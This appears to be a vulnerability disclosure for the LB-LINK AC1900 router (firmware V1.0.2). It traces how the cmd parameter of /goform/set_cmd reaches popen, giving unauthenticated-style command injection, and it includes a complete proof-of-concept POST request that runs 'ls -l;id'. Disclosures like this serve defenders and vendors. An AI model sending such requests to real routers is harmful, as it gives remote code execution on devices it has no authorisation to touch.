| Vendor | LBLINK |
|---|---|
| Product | AC1900 |
| Firmware Version | V1.0.2 |
https://www.b-link.net.cn/downloads_16.html
In the LB-LINK ac1900 router with the firmware version of V1.0.2, there is a command injection vulnerability in the route /goform/set_cmd, which may lead to remote arbitrary code execution.
In the backend processing function sub_44F18C of the route /goform/set_cmd, the parameter cmd is retrieved from the HTTP message through the function websGetVar. After the parameter is serialized in JSON, it will be passed into the library function bs_setCmd.
In the library function set_cmd, the cmd field is extracted from the JSON data and passed into popen for command execution. Attacker can pass in any cmd parameter to achieve remote code execution.
POST /goform/set_cmd HTTP/1.1
Host: 192.168.16.1
Content-Length: 12
X-Requested-With: XMLHttpRequest
Accept-Language: zh-CN,zh;q=0.9
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.140 Safari/537.36
Origin: <http://192.168.16.1>
Referer: <http://192.168.16.1/admin/more.html>
Accept-Encoding: gzip, deflate, br
Cookie: platform=0; user=admin
Connection: keep-alive
cmd=ls -l;id
